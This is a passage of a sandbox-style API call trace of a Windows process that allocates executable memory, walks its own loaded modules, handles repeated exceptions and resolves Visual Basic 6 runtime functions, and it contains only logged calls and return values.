lpSystemTime=0x28fd24 | out: lpSystemTime=0x28fd24*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x0, wMilliseconds=0x18c)) [0164.555] GetLastError () returned 0x0 [0164.555] SetLastError (dwErrCode=0x0) [0164.555] GetLastError () returned 0x0 [0164.555] SetLastError (dwErrCode=0x0) [0164.555] GetLastError () returned 0x0 [0164.555] SetLastError (dwErrCode=0x0) [0164.555] GetLocalTime (in: lpSystemTime=0x28fe50 | out: lpSystemTime=0x28fe50*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x0, wMilliseconds=0x18c)) [0164.555] GetLastError () returned 0x0 [0164.555] SetLastError (dwErrCode=0x0) [0164.555] GetLastError () returned 0x0 [0164.556] SetLastError (dwErrCode=0x0) [0164.556] GetLastError () returned 0x0 [0164.556] SetLastError (dwErrCode=0x0) [0164.556] GetLastError () returned 0x0 [0164.556] SetLastError (dwErrCode=0x0) [0164.556] GetLastError () returned 0x0 [0164.556] SetLastError (dwErrCode=0x0) [0164.556] GetLastError () returned 0x0 [0164.556] SetLastError (dwErrCode=0x0) [0164.556] GetLastError () returned 0x0 [0164.556] SetLastError (dwErrCode=0x0) [0164.556] GetLastError () returned 0x0 [0164.556] SetLastError (dwErrCode=0x0) [0164.556] GetLastError () returned 0x0 [0164.557] SetLastError (dwErrCode=0x0) [0164.557] GetLastError () returned 0x0 [0164.557] SetLastError (dwErrCode=0x0) [0164.557] GetLastError () returned 0x0 [0164.557] SetLastError (dwErrCode=0x0) [0164.557] GetLastError () returned 0x0 [0164.557] SetLastError (dwErrCode=0x0) [0164.557] GetLastError () returned 0x0 [0164.557] SetLastError (dwErrCode=0x0) [0164.557] GetLastError () returned 0x0 [0164.557] SetLastError (dwErrCode=0x0) [0164.558] GetLastError () returned 0x0 [0164.558] SetLastError (dwErrCode=0x0) [0164.558] GetLastError () returned 0x0 [0164.558] SetLastError (dwErrCode=0x0) [0164.558] GetLastError () returned 0x0 [0164.558] SetLastError (dwErrCode=0x0) [0164.558] GetLastError () returned 0x0 [0164.558] SetLastError (dwErrCode=0x0) [0164.558] GetLastError () returned 0x0 [0164.558] SetLastError (dwErrCode=0x0) [0164.558] GetLastError () returned 0x0 [0164.558] SetLastError (dwErrCode=0x0) [0164.559] GetLastError () returned 0x0 [0164.559] SetLastError (dwErrCode=0x0) [0164.559] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x523e84, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x28fe78 | out: lpThreadId=0x28fe78*=0xb50) returned 0x120 [0164.561] GetLastError () returned 0x0 [0164.561] SetLastError (dwErrCode=0x0) [0164.561] GetLastError () returned 0x0 [0164.561] SetLastError (dwErrCode=0x0) [0164.561] GetLastError () returned 0x0 [0164.561] SetLastError (dwErrCode=0x0) [0164.561] GetLastError () returned 0x0 [0164.561] SetLastError (dwErrCode=0x0) [0164.561] GetLastError () returned 0x0 [0164.561] SetLastError (dwErrCode=0x0) [0164.561] GetLastError () returned 0x0 [0164.562] SetLastError (dwErrCode=0x0) [0164.562] GetLastError () returned 0x0 [0164.562] SetLastError (dwErrCode=0x0) [0164.562] GetLastError () returned 0x0 [0164.562] SetLastError (dwErrCode=0x0) [0164.562] GetLastError () returned 0x0 [0164.562] SetLastError (dwErrCode=0x0) [0164.562] GetLastError () returned 0x0 [0164.562] SetLastError (dwErrCode=0x0) [0164.562] GetLastError () returned 0x0 [0164.563] SetLastError (dwErrCode=0x0) [0164.563] GetLastError () returned 0x0 [0164.563] SetLastError (dwErrCode=0x0) [0164.563] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.563] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.563] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.564] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.564] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.564] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.568] GetLastError () returned 0x0 [0164.568] SetLastError (dwErrCode=0x0) [0164.568] GetLastError () returned 0x0 [0164.568] SetLastError (dwErrCode=0x0) [0164.568] GetLastError () returned 0x0 [0164.568] SetLastError (dwErrCode=0x0) [0164.568] GetCurrentProcessId () returned 0xbac [0164.568] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xbac) returned 0x124 [0164.570] Module32First (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.571] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.573] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0164.573] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0164.573] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.574] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0164.574] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0164.611] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.649] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.655] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.666] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.668] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.672] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.681] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.686] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.688] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.715] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.717] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.719] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.735] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.742] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.745] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.750] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.759] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.763] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.772] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.777] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.782] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.790] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.795] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0164.797] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 0 [0164.798] CloseHandle (hObject=0x124) returned 1 [0164.798] GetLastError () returned 0x12 [0164.803] SetLastError (dwErrCode=0x12) [0164.803] GetLastError () returned 0x12 [0164.803] SetLastError (dwErrCode=0x12) [0164.803] GetLastError () returned 0x12 [0164.804] SetLastError (dwErrCode=0x12) [0164.804] VirtualAlloc (lpAddress=0x2b14000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x2b14000 [0164.807] VirtualFree (lpAddress=0x2b14000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0164.808] GetLastError () returned 0x12 [0164.808] SetLastError (dwErrCode=0x12) [0164.808] GetLastError () returned 0x12 [0164.809] SetLastError (dwErrCode=0x12) [0164.809] GetLastError () returned 0x12 [0164.809] SetLastError (dwErrCode=0x12) [0164.809] GetLastError () returned 0x12 [0164.810] SetLastError (dwErrCode=0x12) [0164.810] GetLastError () returned 0x12 [0164.810] SetLastError (dwErrCode=0x12) [0164.810] GetLastError () returned 0x12 [0164.810] SetLastError (dwErrCode=0x12) [0164.810] VirtualAlloc (lpAddress=0x2b14000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x2b14000 [0164.813] VirtualFree (lpAddress=0x2b14000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0164.819] GetLastError () returned 0x12 [0164.819] SetLastError (dwErrCode=0x12) [0164.819] GetLastError () returned 0x12 [0164.819] SetLastError (dwErrCode=0x12) [0164.819] GetLastError () returned 0x12 [0164.819] SetLastError (dwErrCode=0x12) [0164.819] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.819] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.820] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.820] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0164.820] GetLastError () returned 0x12 [0164.820] SetLastError (dwErrCode=0x12) [0164.820] GetLastError () returned 0x12 [0164.820] SetLastError (dwErrCode=0x12) [0164.820] GetLastError () returned 0x12 [0164.820] SetLastError (dwErrCode=0x12) [0164.820] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.821] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.821] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.821] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0164.821] GetLastError () returned 0x12 [0164.821] SetLastError (dwErrCode=0x12) [0164.821] GetLastError () returned 0x12 [0164.821] SetLastError (dwErrCode=0x12) [0164.821] GetLastError () returned 0x12 [0164.822] SetLastError (dwErrCode=0x12) [0164.822] VirtualAlloc (lpAddress=0x2b14000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0x2b14000 [0164.834] VirtualFree (lpAddress=0x2b14000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0164.835] VirtualAlloc (lpAddress=0x2b14000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x2b14000 [0164.837] VirtualFree (lpAddress=0x2b14000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0164.838] GetLastError () returned 0x12 [0164.838] SetLastError (dwErrCode=0x12) [0164.838] GetLastError () returned 0x12 [0164.839] SetLastError (dwErrCode=0x12) [0164.839] GetLastError () returned 0x12 [0164.839] SetLastError (dwErrCode=0x12) [0164.839] VirtualAlloc (lpAddress=0x2b14000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x2b14000 [0164.842] VirtualFree (lpAddress=0x2b14000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0164.843] GetLastError () returned 0x12 [0164.844] SetLastError (dwErrCode=0x12) [0164.844] GetLastError () returned 0x12 [0164.844] SetLastError (dwErrCode=0x12) [0164.844] GetLastError () returned 0x12 [0164.844] SetLastError (dwErrCode=0x12) [0164.844] GetLastError () returned 0x12 [0164.845] SetLastError (dwErrCode=0x12) [0164.845] GetLastError () returned 0x12 [0164.845] SetLastError (dwErrCode=0x12) [0164.845] GetLastError () returned 0x12 [0164.851] SetLastError (dwErrCode=0x12) [0164.851] GetLastError () returned 0x12 [0164.851] SetLastError (dwErrCode=0x12) [0164.851] GetLastError () returned 0x12 [0164.851] SetLastError (dwErrCode=0x12) [0164.851] GetLastError () returned 0x12 [0164.852] SetLastError (dwErrCode=0x12) [0164.852] GetLastError () returned 0x12 [0164.852] SetLastError (dwErrCode=0x12) [0164.852] GetLastError () returned 0x12 [0164.852] SetLastError (dwErrCode=0x12) [0164.852] GetLastError () returned 0x12 [0164.853] SetLastError (dwErrCode=0x12) [0164.853] GetLastError () returned 0x12 [0164.853] SetLastError (dwErrCode=0x12) [0164.853] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.854] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.855] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.855] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.856] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.856] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.857] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.857] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.857] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.858] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.858] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.859] GetLastError () returned 0x0 [0164.859] SetLastError (dwErrCode=0x0) [0164.859] GetLastError () returned 0x0 [0164.859] SetLastError (dwErrCode=0x0) [0164.860] GetLastError () returned 0x0 [0164.860] SetLastError (dwErrCode=0x0) [0164.860] VirtualAlloc (lpAddress=0x2b14000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x40) returned 0x2b14000 [0164.867] VirtualFree (lpAddress=0x2b1c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0164.868] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="MSVBVM60.DLL", cbMultiByte=12, lpWideCharStr=0x28edd0, cchWideChar=2047 | out: lpWideCharStr="MSVBVM60.DLL䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆┱ĉ(䘨睝◤ĉ(V") returned 12 [0164.868] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="MSVBVM60.DLL", cchWideChar=12, lpMultiByteStr=0x28edd0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSVBVM60.DLL6", lpUsedDefaultChar=0x0) returned 12 [0164.869] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarSub" | out: DestinationString="__vbaVarSub") [0164.869] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarSub", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a477ea) returned 0x0 [0164.870] RtlInitString (in: DestinationString=0x28fda8, SourceString="_CIcos" | out: DestinationString="_CIcos") [0164.870] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_CIcos", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a39386) returned 0x0 [0164.871] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fptan" | out: DestinationString="_adj_fptan") [0164.871] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fptan", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a309f9) returned 0x0 [0164.872] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarMove" | out: DestinationString="__vbaVarMove") [0164.873] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarMove", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a46aee) returned 0x0 [0164.873] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeVar" | out: DestinationString="__vbaFreeVar") [0164.874] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeVar", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a46831) returned 0x0 [0164.874] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaLenBstr" | out: DestinationString="__vbaLenBstr") [0164.874] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaLenBstr", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a26a9b) returned 0x0 [0164.875] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaStrVarMove" | out: DestinationString="__vbaStrVarMove") [0164.875] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaStrVarMove", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a21929) returned 0x0 [0164.876] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaPut3" | out: DestinationString="__vbaPut3") [0164.876] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaPut3", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a256fa) returned 0x0 [0164.881] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeVarList" | out: DestinationString="__vbaFreeVarList") [0164.881] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeVarList", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a47262) returned 0x0 [0164.882] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaEnd" | out: DestinationString="__vbaEnd") [0164.882] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaEnd", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a0be88) returned 0x0 [0164.883] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m64" | out: DestinationString="_adj_fdiv_m64") [0164.883] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m64", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a302ba) returned 0x0 [0164.884] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaNextEachVar" | out: DestinationString="__vbaNextEachVar") [0164.884] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaNextEachVar", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a463bc) returned 0x0 [0164.885] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeObjList" | out: DestinationString="__vbaFreeObjList") [0164.885] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeObjList", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a19fc3) returned 0x0 [0164.886] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x204, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a270b7) returned 0x0 [0164.887] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fprem1" | out: DestinationString="_adj_fprem1") [0164.887] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fprem1", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a30941) returned 0x0 [0164.887] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaStrCat" | out: DestinationString="__vbaStrCat") [0164.888] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaStrCat", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a26a76) returned 0x0 [0164.888] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarCmpNe" | out: DestinationString="__vbaVarCmpNe") [0164.889] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarCmpNe", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a49957) returned 0x0 [0164.889] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaSetSystemError" | out: DestinationString="__vbaSetSystemError") [0164.889] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaSetSystemError", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a0c33a) returned 0x0 [0164.890] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaHresultCheckObj" | out: DestinationString="__vbaHresultCheckObj") [0164.890] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaHresultCheckObj", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a1a274) returned 0x0 [0164.891] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m32" | out: DestinationString="_adj_fdiv_m32") [0164.891] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m32", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a3026e) returned 0x0 [0164.892] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarForInit" | out: DestinationString="__vbaVarForInit") [0164.892] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarForInit", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a493cc) returned 0x0 [0164.896] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x252, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a1cd3a) returned 0x0 [0164.896] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaOnError" | out: DestinationString="__vbaOnError") [0164.897] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaOnError", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a2499d) returned 0x0 [0164.898] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaObjSet" | out: DestinationString="__vbaObjSet") [0164.898] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaObjSet", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a19ff1) returned 0x0 [0164.899] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m16i" | out: DestinationString="_adj_fdiv_m16i") [0164.899] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m16i", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a30306) returned 0x0 [0164.900] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaObjSetAddref" | out: DestinationString="__vbaObjSetAddref") [0164.900] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaObjSetAddref", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a1a008) returned 0x0 [0164.901] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdivr_m16i" | out: DestinationString="_adj_fdivr_m16i") [0164.902] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdivr_m16i", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a30406) returned 0x0 [0164.902] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x256, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a0e0f7) returned 0x0 [0164.902] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x208, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a27621) returned 0x0 [0164.903] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVargVar" | out: DestinationString="__vbaVargVar") [0164.903] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVargVar", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a472be) returned 0x0 [0164.904] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaBoolVarNull" | out: DestinationString="__vbaBoolVarNull") [0164.904] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaBoolVarNull", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a47185) returned 0x0 [0164.905] RtlInitString (in: DestinationString=0x28fda8, SourceString="_CIsin" | out: DestinationString="_CIsin") [0164.905] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_CIsin", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a394ee) returned 0x0 [0164.905] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x20d, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a27db9) returned 0x0 [0164.906] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarZero" | out: DestinationString="__vbaVarZero") [0164.906] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarZero", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a46ea2) returned 0x0 [0164.907] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x278, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a2702f) returned 0x0 [0164.923] lstrcpyA (in: lpString1=0x28fde4, lpString2="" | out: lpString1="") returned="" [0164.923] SetErrorMode (uMode=0x8001) returned 0x8001 [0164.923] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x28faa0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0164.923] GetUserDefaultLCID () returned 0x409 [0164.923] lstrcpyA (in: lpString1=0x28f7a0, lpString2="*" | out: lpString1="*") returned="*" [0164.928] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x28fba4, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0164.928] GetSystemDefaultLCID () returned 0x409 [0164.928] GetUserDefaultLCID () returned 0x409 [0164.928] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x28fbae, cchData=2 | out: lpLCData=".") returned 2 [0164.928] GetStockObject (i=13) returned 0x18a002e [0164.928] GetObjectA (in: h=0x18a002e, c=60, pv=0x28fb74 | out: pv=0x28fb74) returned 60 [0164.928] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x28fb70, cchData=4 | out: lpLCData="ENU") returned 4 [0164.928] lstrcpyA (in: lpString1=0x28fba0, lpString2="EN" | out: lpString1="EN") returned="EN" [0164.928] lstrlenA (lpString="{xx}") returned 4 [0164.929] lstrlenA (lpString="VB98.CHM") returned 8 [0164.929] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0164.929] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x28fb70, cchData=4 | out: lpLCData="ENU") returned 4 [0164.929] lstrcpyA (in: lpString1=0x28fba0, lpString2="EN" | out: lpString1="EN") 